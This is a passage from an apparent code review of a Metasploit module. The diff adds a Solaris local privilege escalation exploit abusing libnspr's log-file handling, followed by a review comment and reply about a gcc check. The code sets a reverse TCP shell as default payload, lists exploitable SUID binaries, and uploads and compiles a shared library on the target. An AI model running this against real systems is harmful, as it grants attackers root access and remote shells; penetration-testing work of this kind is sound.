modules/exploits/solaris/local/libnspr_nspr_log_file_priv_esc.rb

```diff
@@ -0,0 +1,229 @@
+          ['EDB', '2543'],
+          ['EDB', '2569'],
+          ['EDB', '2641'],
+          ['URL', 'https://securitytracker.com/id/1017050'],
+          ['URL', 'https://securitytracker.com/id/1017051'],
+          ['URL', 'https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSPR'],
+          ['URL', 'http://web.archive.org/web/20061118024339/http://labs.idefense.com:80/intelligence/vulnerabilities/display.php?id=418'],
+          ['URL', 'http://web.archive.org/web/20061110164829/http://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1']
+        ],
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'iDefense',     # Discovery
+          'Marco Ivaldi', # Exploit
+          'Brendan Coles' # Metasploit
+        ],
+      'DisclosureDate' => 'Oct 11 2006',
+      'Privileged'     => true,
+      'Platform'       => ['solaris'],
+      'Arch'           => [ARCH_X86, ARCH_X64, ARCH_SPARC],
+      'Targets'        => [['Auto', {}]],
+      'SessionTypes'   => ['shell', 'meterpreter'],
+      'DefaultOptions' =>
+        {
+          'PAYLOAD'     => 'solaris/x86/shell_reverse_tcp',
+          'WfsDelay'    => 10,
+          'PrependFork' => true
+        },
+      'DefaultTarget'  => 0))
+    register_options [
+      # Some useful example SUID executables:
+      # * /usr/bin/cancel
+      # * /usr/bin/chkey
+      # * /usr/bin/lp
+      # * /usr/bin/lpset
+      # * /usr/bin/lpstat
+      # * /usr/lib/lp/bin/netpr
+      # * /usr/sbin/lpmove
+      OptString.new('SUID_PATH', [true, 'Path to suid executable (must be linked to a vulnerable version of libnspr4.so)', '/usr/bin/cancel'])
+    ]
+    register_advanced_options [
+      OptBool.new('ForceExploit',  [false, 'Override check result', false]),
+      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+    ]
+  end
+
+  def suid_bin_path
+    datastore['SUID_PATH']
+  end
+
+  def is_writable?(path)
+    cmd_exec("[ -w #{path} ] && echo true").include? 'true'
+  end
+
+  def mkdir(path)
+    vprint_status "Creating directory '#{path}'"
+    cmd_exec "mkdir -p '#{path}'"
+    register_dir_for_cleanup path
+  end
+
+  def upload(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    rm_f path
+    write_file path, data
+    register_file_for_cleanup path
+  end
+
+  def upload_and_compile(path, data)
+    upload "#{path}.c", data
+
+    output = cmd_exec "PATH=$PATH:/usr/sfw/bin/ gcc -fPIC -shared -g -lc -o #{path} #{path}.c"
+    unless output.blank?
+      print_error output
+      fail_with Failure::Unknown, "#{path}.c failed to compile"
+    end
+
+    register_file_for_cleanup path
+  end
+
+  def check
+    unless setuid? suid_bin_path
+      vprint_error "#{suid_bin_path} is not setuid"
+      return CheckCode::Safe
+    end
+    vprint_good "#{suid_bin_path} is setuid"
+
+    unless command_exists?('gcc') || command_exists?('/usr/sfw/bin/gcc')
```

Comment:
now that the lib was patched, this could be updated

Reply:
I've changed this to `has_gcc?`. It's worth noting this branch won't be rebased, so whoever tests this module will need to apply the patch for the `has_gcc?` method to the Solaris lib, or bypass the `check` method by setting `ForceExploit`.